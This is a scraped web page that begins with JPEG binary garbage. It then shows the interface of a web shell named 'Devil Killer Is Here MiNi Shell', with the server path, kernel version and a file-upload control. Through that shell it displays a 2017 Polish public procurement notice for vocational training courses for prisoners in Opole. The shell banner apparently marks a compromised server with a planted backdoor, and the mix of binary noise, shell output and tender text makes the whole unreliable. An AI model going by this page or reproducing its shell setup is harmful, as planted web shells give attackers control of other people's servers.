JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20170317/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20170317/45792-N-2017.html

<BR/><p>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia (jeżeli dotyczy):  </p><a class='base announcementNumber' href='http://www.zp.sw.gov.pl' target='_blank'>http://www.zp.sw.gov.pl</a><br/><hr class='linkedItemsSeparator' /><div class="divRow_xforms"><div>
              Ogłoszenie nr 45792 - 2017
              z dnia 2017-03-17 r.
            </div><div class="headerMedium_xforms" style="text-align: center">Opole: Usługa zorganizowania i przeprowadzenia 48 cykli szkoleniowo-aktywizacyjnych składających się z kursów zawodowych, szkoleń kompetencyjnych w zakresie aktywizacji zawodowej w jednostkach OISW Opole.
<br />
            OGŁOSZENIE O ZAMÓWIENIU -
            
              Usługi
            </div><div><b>Zamieszczanie ogłoszenia:</b>
              nieobowiązkowe
            </div><div><b>Ogłoszenie dotyczy:</b>
              zamówienia publicznego
            </div><div><b>Zamówienie dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej </b><br /><div style="padding-left: 20px">
                tak
              </div><br /><b>Nazwa projektu lub programu</b><br />Podniesienie kwalifikacji zawodowych więźniów w celu ich powrotu na rynek pracy po zakończeniu odbywania kary pozbawienia wolności realizowany w ramach Działania 2.7 Zwiększenie szans na zatrudnienie osób szczególnie zagrożonych wykluczeniem społecznym Programu Operacyjnego Wiedza Edukacja Rozwój 2014  2020, współfinansowanego ze środków Europejskiego Funduszu Społecznego</div><div><b>O zamówienie mogą ubiegać się wyłącznie zakłady pracy chronionej oraz wykonawcy, których działalność, lub działalność ich wyodrębnionych organizacyjnie jednostek, które będą realizowały zamówienie, obejmuje  społeczną i zawodową integrację osób będących członkami grup społecznie marginalizowanych </b><br /><div style="padding-left: 20px">
                tak
              </div><br />
            Należy podać minimalny procentowy wskaźnik zatrudnienia osób należących do jednej lub więcej kategorii, o których mowa w art. 22 ust. 2 ustawy Pzp, nie mniejszy niż 30%, osób zatrudnionych przez zakłady pracy chronionej lub wykonawców albo ich jednostki (w %)
            <br />30%</div><div class="headerLarge_xforms" style="text-align: left"><u>SEKCJA I: ZAMAWIAJĄCY</u></div><div style="padding-left: 20px"><b>Postępowanie przeprowadza centralny zamawiający </b><br /><div style="padding-left: 20px">
                nie
              </div><b>Postępowanie przeprowadza podmiot, któremu zamawiający powierzył/powierzyli przeprowadzenie postępowania </b><br /><div style="padding-left: 20px">
                nie
              </div><b>Informacje na temat podmiotu któremu zamawiający powierzył/powierzyli prowadzenie postępowania:</b><br /><b>Postępowanie jest przeprowadzane wspólnie przez zamawiających</b><br /><div style="padding-left: 20px">
                nie
              </div><br />
            Jeżeli tak, należy wymienić zamawiających, którzy wspólnie przeprowadzają postępowanie oraz podać adresy ich siedzib, krajowe numery identyfikacyjne oraz osoby do kontaktów wraz z danymi do kontaktów:
            <br /><br /><b>Postępowanie jest przeprowadzane wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej </b><br /><div style="padding-left: 20px">
                nie
              </div><b>W przypadku przeprowadzania postępowania wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej  mające zastosowanie krajowe prawo zamówień publicznych:</b><br /><b>Informacje dodatkowe:</b><br /></div><div style="padding-left: 20px;"><div style="text-align: left"><b>I. 1) NAZWA I ADRES: </b>Okręgowy Inspektorat Służby Więziennej w Opolu, krajowy numer identyfikacyjny
              53115620200000, ul.
              Sądowa 
              2,
              45-033  
              Opole, woj.
              opolskie, państwo
              Polska, tel.
              774 539 761, e-mail
              tomasz.iwaniuk@sw.gov.pl, faks
              774 544 439.
              <br />
              Adres strony internetowej (URL): www.sw.gov.pl<br />
                Adres profilu nabywcy:

                www.zp.sw.gov.pl<br /></div><div style="text-align: left"><b>I. 2) RODZAJ ZAMAWIAJĄCEGO: </b>
                Inny: Pańtwowa jednostkla organizacyjna nieposiadająca osobowości prawnej</div><div style="text-align: left"><b>
                I.3) WSPÓLNE UDZIELANIE ZAMÓWIENIA <i>(jeżeli dotyczy)</i>:
              </b><div style="padding-left: 20px">
                Podział obowiązków między zamawiającymi w przypadku wspólnego przeprowadzania postępowania, w tym
                w przypadku wspólnego przeprowadzania postępowania z zamawiającymi z innych państw członkowskich Unii Europejskiej (który z zamawiających jest odpowiedzialny za przeprowadzenie postępowania, czy i w jakim zakresie za przeprowadzenie postępowania odpowiadają pozostali zamawiający, czy zamówienie będzie udzielane przez każdego z zamawiających indywidualnie, czy zamówienie zostanie udzielone w imieniu i na rzecz pozostałych zamawiających):
                <br /></div></div><div style="text-align: left"><b>
                I.4) KOMUNIKACJA:
              </b><br /><b>Nieograniczony, pełny i bezpośredni dostęp do dokumentów z postępowania można uzyskać pod adresem (URL)</b><div style="padding-left: 20px">
                  tak
                <br />www.zp.sw.gov.pl</div><br /><b>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia </b><div style="padding-left: 20px">
                  tak
                <br />www.zp.sw.gov.pl</div><br /><b>Dostęp do dokumentów z postępowania jest ograniczony - więcej informacji można uzyskać pod adresem </b><div style="padding-left: 20px">
                  nie
                <br /></div><br /><b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu należy przesyłać:</b><br /><b>Elektronicznie</b><div style="padding-left: 20px">
                  nie
                <br />
                adres
                <br /></div><br /><div style="padding-left: 20px"><b>Dopuszczone jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b><br />
                  nie
                <br /><b>Wymagane jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b><br />
                  tak
                  <br />
                  Inny sposób:
                  <br />pisemnie - za pośrednictwem operatora pocztowego, osobiście lub pocztą kurierską.<br />
                Adres:
                <br />Okręgowy Inspektorat Służby Więziennej 45-033 Opole, ul. Sądowa 2 (sekretariat I piętro)</div><br /><b>Komunikacja elektroniczna wymaga korzystania z narzędzi i urządzeń lub formatów plików, które nie są ogólnie dostępne</b><div style="padding-left: 20px">
                  nie
                <br />
                Nieograniczony, pełny, bezpośredni i bezpłatny dostęp do tych narzędzi można uzyskać pod adresem: (URL)
                <br /></div></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA II: PRZEDMIOT ZAMÓWIENIA
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><br /><b>II.1) Nazwa nadana zamówieniu przez zamawiającego: </b>Usługa zorganizowania i przeprowadzenia 48 cykli szkoleniowo-aktywizacyjnych składających się z kursów zawodowych, szkoleń kompetencyjnych w zakresie aktywizacji zawodowej w jednostkach OISW Opole.
<br /><b>Numer referencyjny: </b>Numer referencyjny: OI-P.2230.1.2017<br /><b>Przed wszczęciem postępowania o udzielenie zamówienia przeprowadzono dialog techniczny </b><br /><div style="padding-left: 20px; text-align: justify">
                  nie
                </div><br /><b>II.2) Rodzaj zamówienia: </b>
                usługi
              <br /><b>II.3) Informacja o możliwości składania ofert częściowych</b><br />
              Zamówienie podzielone jest na części:
              <br /><div style="padding-left: 20px">
                  Tak
                  <br /><b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu można składać w odniesieniu do:</b><br />
                    wszystkich części
                  <br /></div><br /><br /><b>
                II.4) Krótki opis przedmiotu zamówienia
              </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań )</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:
              </b>Przedmiotem zamówienia jest świadczenie zorganizowania i przeprowadzenia przez Wykonawcę 48 cykli szkoleniowo-aktywizacyjnych dla osób osadzonych w jednostkach penitencjarnych podległych Okręgowemu Inspektoratowi Służby Więziennej w Opolu: w Areszcie Śledczym w Opolu, Zakładzie Karnym w Brzegu,Zakładzie Karnym w Głubczycach, Zakładzie Karnym w Kluczborku, Zakładzie Karnym w Nysie, Zakładzie Karnym w Sierakowie Śląskim, Zakładzie Karnym Nr 1 w Strzelcach Opolskich i Zakładzie Karnym Nr 2 w Strzelcach Opolskich.
Część nr: 1
Zorganizowanie i przeprowadzenie cykli szkoleniowo-aktywizacyjnych osadzonych odbywających karę pozbawienia wolności w Zakładzie Karnym w Brzegu.
Cykl nr 1. Kucharz, połączony z aktywizacją zawodową, ilość godzin 136, liczba uczestników  12 osadzonych mężczyzn.
Cykl nr 2. Kucharz, połączony z aktywizacją zawodową, ilość godzin 136, liczba uczestników  12 osadzonych mężczyzn.
Cykl nr 3. Malarz tapeciarz połączony z aktywizacją zawodową, ilość godzin 120, liczba uczestników  12osadzonych mężczyzn.
Cykl nr 4. Malarz tapeciarz połączony z aktywizacją zawodową, ilość godzin 120, liczba uczestników  12osadzonych mężczyzn.
Cykl nr 5. Brukarz połączony z aktywizacją zawodową, ilość godzin 136, liczba uczestników  12 osadzonych mężczyzn.
Cykl nr 6. Elektryk z uprawnieniami E do 1 kV połączony z aktywizacją zawodową, ilość godzin 136, liczba uczestników  12 osadzonych mężczyzn
Cykl nr 7. Fryzjer połączony z aktywizacją zawodową, ilość godzin 136, liczba uczestników  12 osadzonych mężczyzn.
Część nr: 2
Zorganizowanie i przeprowadzenie cykli szkoleniowo-aktywizacyjnych osadzonych odbywających karę pozbawienia wolności w Zakładzie Karnym w Głubczycach.
Cykl nr 1. Technolog wykończenia wnętrz połączony z aktywizacją zawodową, ilość godzin  120, ilość uczestników  12 osadzonych mężczyzn.
Cykl nr 2. Technolog wykończenia wnętrz połączony z aktywizacją zawodową, ilość godzin  120, ilość uczestników  12 osadzonych mężczyzn.
Cykl nr 3. Brukarz połączony z aktywizacją zawodową, ilość godzin  120, ilość uczestników  12 osadzonych mężczyzn.
Cykl nr 4. Brukarz połączony z aktywizacją zawodową, ilość godzin  120, ilość uczestników  12 osadzonych mężczyzn.
Cykl nr 5. Brukarz połączony z aktywizacją zawodową, ilość godzin  120, ilość uczestników  12 osadzonych mężczyzn.
Część nr: 3
Zorganizowanie i przeprowadzenie cykli szkoleniowo-aktywizacyjnych osadzonych odbywających karę pozbawienia wolności w Zakładzie Karnym w Kluczborku.
Cykl nr 1. Fryzjer połączony z aktywizacją zawodową, ilość godzin  100, ilość uczestników  12 osadzonych mężczyzn.
Cykl nr 2. Spawacz metodą MIG połączony z aktywizacją zawodową, ilość godzin  179, ilość uczestników  12osadzonych mężczyzn.
Cykl nr 3. Brukarz połączony z aktywizacją zawodową, ilość godzin  109, ilość uczestników  12 osadzonych mężczyzn.
Cykl nr 4. Elektryk uprawnienia E do 1kV połączony z aktywizacją zawodową, ilość godzin  100, ilość uczestników  12 osadzonych mężczyzn.
Cykl nr 5. Operator wózków jezdniowych z napędem silnikowym połączony z aktywizacją zawodową, ilość godzin  100, ilość uczestników  12 osadzonych mężczyzn.
Cykl nr 6. Tapicer połączony z aktywizacją zawodową, ilość godzin 120, ilość uczestników  12 osadzonych mężczyzn.
Część nr: 4
Zorganizowanie i przeprowadzenie cykli szkoleniowo-aktywizacyjnych osadzonych odbywających karę pozbawienia wolności w Zakładzie Karnym w Nysie.
Cykl nr 1. Brukarz połączony z aktywizacją zawodową, ilość godzin  136, ilość uczestników  12 osadzonych mężczyzn.
Cykl nr 2. Brukarz połączony z aktywizacją zawodową, ilość godzin  136, ilość uczestników  12 osadzonych mężczyzn.
Cykl nr 3. Malarz połączony z aktywizacją zawodową, ilość godzin  136, ilość uczestników  12 osadzonych mężczyzn.
Cykl nr 4. Monter izolacji cieplnej połączony z aktywizacją zawodową, ilość godzin  136, ilość uczestników  12osadzonych mężczyzn.
Cykl nr 5. Spawacz metodą TIG połączony z aktywizacją zawodową, ilość godzin  136, ilość uczestników  12osadzonych mężczyzn.
Cykl nr 6. Technolog wykończenia wnętrz połączony z aktywizacją zawodową, ilość godzin  136, ilość uczestników  12 osadzonych mężczyzn.
Cykl nr 7. Technolog wykończenia wnętrz połączony z aktywizacją zawodową, ilość godzin  136, ilość uczestników  12 osadzonych mężczyzn.
Część nr: 5
Zorganizowanie i przeprowadzenie cykli szkoleniowo-aktywizacyjnych osadzonych odbywających karę pozbawienia wolności w Zakładzie Karnym w Sierakowie Śląskim.
Cykl nr 1. Operator maszyn i urządzeń przetwórstwa tworzyw sztucznych połączony z aktywizacją zawodową,ilość godzin  106, ilość uczestników  12 osadzonych mężczyzn.
Cykl nr 2. Operator maszyn i urządzeń przetwórstwa tworzyw sztucznych połączony z aktywizacją zawodową,ilość godzin  106, ilość uczestników  12 osadzonych mężczyzn.
Cykl nr 3. Malarz wykończeniowy połączony z aktywizacją zawodową, ilość godzin  110, ilość uczestników 12 osadzonych mężczyzn.
Cykl nr 4. Ogrodnik z obsługą kos spalinowych połączony z aktywizacją zawodową, ilość godzin  110, ilość uczestników  12 osadzonych mężczyzn.
Cykl nr 5. Ogrodnik z obsługą kos spalinowych połączony z aktywizacją zawodową, ilość godzin  110, ilość uczestników  12 osadzonych mężczyzn.
Cykl nr 6. Pilarz z obsługą spalinowych pilarek łańcuchowych połączony z aktywizacją zawodową, ilość godzin 110, ilość uczestników  12 osadzonych mężczyzn.
Część nr: 6
Zorganizowanie i przeprowadzenie cykli szkoleniowo-aktywizacyjnych osadzonych odbywających karę pozbawienia wolności w Zakładzie Karnym nr 1 w Strzelcach Opolskich.
Cykl nr 1. Malarz-szpachlarz połączony z aktywizacją zawodową, ilość godzin  130, ilość uczestników  12osadzonych mężczyzn.
Cykl nr 2. Malarz-szpachlarz połączony z aktywizacją zawodową, ilość godzin  130, ilość uczestników  12osadzonych mężczyzn.
Cykl nr 3. Opiekun osób starszych i niepełnosprawnych połączony z aktywizacją zawodową, ilość godzin  130,ilość uczestników  12 osadzonych mężczyzn.
Cykl nr 4. Ogrodnik połączony z aktywizacją zawodową, ilość godzin  100, ilość uczestników  12 osadzonych mężczyzn.
Cykl nr 5. Płytkarz-posadzkarz połączony z aktywizacją zawodową, ilość godzin  130, ilość uczestników  12osadzonych mężczyzn.
Cykl nr 6. Fryzjer męski połączony z aktywizacją zawodową, ilość godzin  130, ilość uczestników  12osadzonych mężczyzn.
Część nr: 7
Zorganizowanie i przeprowadzenie cykli szkoleniowo-aktywizacyjnych osadzonych odbywających karę pozbawienia wolności w Zakładzie Karnym nr 2 w Strzelcach Opolskich.
Cykl nr 1. Brukarz połączony z aktywizacją zawodową, ilość godzin  130, ilość uczestników  12 osadzonych mężczyzn.
Cykl nr 2. Brukarz połączony z aktywizacją zawodową, ilość godzin  130, ilość uczestników  12 osadzonych mężczyzn.
Cykl nr 3. Płytkarz-posadzkarz połączony z aktywizacją zawodową, ilość godzin  130, ilość uczestników  12osadzonych mężczyzn.
Cykl nr 4. Malarz-tapeciarz połączony z aktywizacją zawodową, ilość godzin  130, ilość uczestników  12osadzonych mężczyzn.
Cykl nr 5. Malarz-tapeciarz połączony z aktywizacją zawodową, ilość godzin  130, ilość uczestników  12osadzonych mężczyzn.
Cykl nr 6. Płytkarz-posadzkarz połączony z aktywizacją zawodową, ilość godzin  130, ilość uczestników  12osadzonych mężczyzn.
Część nr: 8
Zorganizowanie i przeprowadzenie cykli szkoleniowo-aktywizacyjnych osadzonych odbywających karę pozbawienia wolności w Areszcie Śledczym Opolu.
Cykl nr 1. Malarz połączony z aktywizacją zawodową, ilość godzin  135, ilość uczestników  12 osadzonych mężczyzn.
Cykl nr 2. Ogrodnik połączony z aktywizacją zawodową, ilość godzin  184, ilość uczestników  12 osadzonych kobiet.
Cykl nr 3. Konserwator powierzchni płaskich połączony z aktywizacją zawodową, ilość godzin  135, ilość uczestników  12 osadzonych mężczyzn.
Cykl nr 4. Kurs komputerowy z obsługą programu magazynowego połączony z aktywizacją zawodową, ilość godzin  135, ilość uczestników  12 osadzonych mężczyzn.
Cykl nr 5. Malarz połączony z aktywizacją zawodową, ilość godzin  135, ilość uczestników  12 osadzonych mężczyzn.<br /><br /><b>II.5) Główny kod CPV: </b>80500000-9<br /><b> Dodatkowe kody CPV:</b>80530000-8,
                80562000-1<br /><b>
                II.6) Całkowita wartość zamówienia </b><i>(jeżeli zamawiający podaje informacje o wartości zamówienia)</i>:
              
              <br />
              Wartość bez VAT:
              <br />
              Waluta:
              <br /><div style="padding-left: 20px"><br /><i>(w przypadku umów ramowych lub dynamicznego systemu zakupów  szacunkowa całkowita maksymalna wartość w całym okresie obowiązywania umowy ramowej lub dynamicznego systemu zakupów)</i></div><br /><b>
                II.7)
                Czy przewiduje się udzielenie zamówień, o których mowa w art. 67 ust. 1 pkt 6 i 7  lub w art. 134 ust. 6 pkt 3  ustawy Pzp:
              </b>
                tak
                <br />
                Określenie przedmiotu, wielkości lub zakresu oraz warunków na jakich zostaną udzielone zamówienia, o których mowa w art. 67 ust. 1 pkt 6 lub w art. 134 ust. 6 pkt 3 ustawy Pzp:
                Zamawiający przewiduje udzielenie zamówień uzupełniających do 30 % wartości zamówienia podstawowego w danej części zamówienia. Udzielenia zamówienia uzupełniającego polega na powtórzeniu podobnych usług jak w zamówieniu podstawowym, tj. zorganizowanie i przeprowadzenie szkoleń w formie cykli aktywizacyjno-szkoleniowych dla osób osadzonych, w ramach realizowanego projektu.<br /><b>II.8) Okres, w którym realizowane będzie zamówienie lub okres, na który została zawarta umowa ramowa lub okres, na który został ustanowiony dynamiczny system zakupów:</b><div style="padding-left: 20px">
                    data zakończenia: 08/12/2017<br /></div><br /><b>II.9) Informacje dodatkowe: </b></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><b>
                III.1) WARUNKI UDZIAŁU W POSTĘPOWANIU
              </b><br /><div style="padding-left: 20px"><b>III.1.1) Kompetencje lub uprawnienia do prowadzenia określonej działalności zawodowej, o ile wynika to z odrębnych przepisów</b><br />
                Określenie warunków:
                Kompetencje i uprawnienia do prowadzonej działalności zawodowej umożliwiającej kształcenie ustawiczne w formie  pozaszkolnej w zakresie  realizacji kursów z par.3 pkt.5 rozporządzenia Ministra Edukacji Narodowej z dnia 11 stycznia 2012 r. w sprawie kształcenia ustawicznego  w formach pozaszkolnych /Dz U z 2014r. poz.622 z późn. zm/. 
(tzn. Wykonawca, zgodnie z par.2 pkt.4-5 w zw. z par.18 ust.1 rozporządzenia Ministra Edukacji Narodowej z dnia 11 stycznia 2012 r. w sprawie kształcenia ustawicznego  w formach pozaszkolnych /Dz U z 2014r. poz.622 z późn. zm/ może być  placówką kształcenia ustawicznego, lub placówką kształcenia praktycznego, lub  ośrodkiem dokształcania i doskonalenia zawodowego w rozumieniu art.2 pkt.3a ustawy z dnia 7.09.1991 roku o systemie oświaty. Podmioty te mogą być publiczne lub niepubliczne). 
Wobec powyższego, jeśli  wykonawca działając jako placówka kształcenia ustawicznego, lub jako placówka kształcenia praktycznego, lub jako ośrodek dokształcania i doskonalenia zawodowego:  
a) jest publiczną placówką założoną przez osobę prawną inną niż jednostka samorządu terytorialnego lub osobę fizyczną, to wykaże, że posiada ważne zezwolenie, o którym mowa w art. 58 ust.3 pkt.1 ustawy z dnia 7.09.1991 roku o systemie oświaty, wydane w formie decyzji administracyjnej, o której mowa w par.6 ust.1 rozporządzenia ministra edukacji narodowej i sportu z dnia 4 marca 2004 r. w sprawie szczegółowych zasad i warunków udzielania i cofania zezwolenia na założenie szkoły lub placówki publicznej przez osobę prawną lub osobę fizyczną. 
b) jest niepubliczną placówką założoną przez osobę prawną lub osobę fizyczną, to wykaże, że posiada aktualny wpis do ewidencji, o której mowa w art. 82 ust.1 ustawy z dnia 7.09.1991 roku o systemie oświaty /Dz.U. z 2004r Nr 256 poz.2572 z późn. zm./ <br />
                Informacje dodatkowe
                <br /><b>III.1.2)  Sytuacja finansowa lub ekonomiczna  </b><br />
                Określenie warunków:
                <br />
                Informacje dodatkowe
                <br /><b>III.1.3) Zdolność techniczna lub zawodowa </b><br />
                Określenie warunków:
                Wykonawca, lub inny podmiot na którego zdolności powołuje się Wykonawca zgodnie z art. 22a ustawy Prawo zamówień publicznych, wykaże, że:
1.a.a.a) dla realizacji zamówienia częściowego, na które złożył ofertę, dysponuje odpowiednim potencjałem kadrowym niezbędnym do jego realizacji, tzn.:
w każdym cyklu szkoleniowo-aktywizacyjnym dla każdego typu zajęć (tj.: - dla zajęć teoretycznych z nauki zawodu; - dla zajęć praktycznych z nauki zawodu; - dla zajęć z zakresu BHP i  p-poż; - dla zajęć z zakresu pomocy przedmedycznej; - dla zajęć z zakresu aktywizacji zawodowej) wykaże, że dysponuje osobą, lub osobami, do ich prowadzenia. Z tym, że każda taka osoba musi posiadać doświadczenie z przeprowadzenia zajęć szkoleniowych obejmujących branżowo każdą tematykę do której zostanie przyporządkowana przez Wykonawcę w wykazie według załącznika nr 7 do SIWZ (* - przez zajęcia szkoleniowe należy rozumieć zajęcia mające na celu uzyskanie, uzupełnienie lub doskonalenie umiejętności i kwalifikacji zawodowych lub ogólnych kursanta).
b) dysponuje odpowiednim doświadczeniem niezbędnym do realizacji części zamówienia, tj. Wykonawca w okresie ostatnich 3 lat przed  upływem terminu składania ofert a jeżeli okres składania ofert jest krótszy  w tym okresie wykonał, a w przypadku będącego w realizacji świadczenia okresowego  dotychczas wykonał: 
co najmniej 2 usługi na podstawie odrębnych stosunków zobowiązaniowych (tj. na podstawie odrębnych umów) z których każda zobowiązywała do wykonania w ciągu 1 miesiąca minimum  2 szkoleń z których każde  przeszkoliło po minimum 10 osób, a wymiar godzinowy każdego szkolenia wynosił po minimum 50 godzin lekcyjnych (każda godzina lekcyjna po minimum 45 minut) 
lub
co najmniej 1 usługę na podstawie umowy, która zobowiązywała do wykonania w ciągu 3 miesięcy minimum  6 szkoleń z których każde  przeszkoliło po minimum 10 osób, a wymiar godzinowy każdego szkolenia wynosił po minimum 50 godzin lekcyjnych (każda godzina lekcyjna po minimum 45 minut) <br />
                Zamawiający wymaga od wykonawców wskazania w ofercie lub we wniosku o dopuszczenie do udziału w postępowaniu imion i nazwisk osób wykonujących czynności przy realizacji zamówienia wraz z informacją o kwalifikacjach zawodowych lub doświadczeniu tych osób:
                
                  tak
                <br />
                Informacje dodatkowe:
                </div><b>
                III.2) PODSTAWY WYKLUCZENIA
              </b><br /><div style="padding-left: 20px"><b>III.2.1) Podstawy wykluczenia określone w art. 24 ust. 1  ustawy Pzp</b><br /><b>III.2.2) Zamawiający przewiduje wykluczenie wykonawcy na podstawie art. 24 ust. 5 ustawy Pzp</b>
                  tak
                  <br />
                  Zamawiający przewiduje następujące fakultatywne podstawy wykluczenia:
                <br />
                  (podstawa wykluczenia określona w art. 24 ust. 5 pkt 1 ustawy Pzp)
                <br /></div><b>
                III.3) WYKAZ OŚWIADCZEŃ SKŁADANYCH PRZEZ WYKONAWCĘ W CELU WSTĘPNEGO POTWIERDZENIA, ŻE NIE PODLEGA ON WYKLUCZENIU ORAZ SPEŁNIA WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ SPEŁNIA KRYTERIA SELEKCJI
              </b><br /><div style="padding-left: 20px"><b>
                  Oświadczenie o niepodleganiu wykluczeniu oraz spełnianiu warunków udziału w postępowaniu
                </b><br />
                  tak
                <br /><b>
                  Oświadczenie o spełnianiu kryteriów selekcji
                </b><br />
                  nie
                </div><b>
                III.4) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW , SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 3 USTAWY PZP:
              </b><br /><div style="padding-left: 20px">a)informacja z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 13, 14 i 21 ustawy, wystawionej nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert;
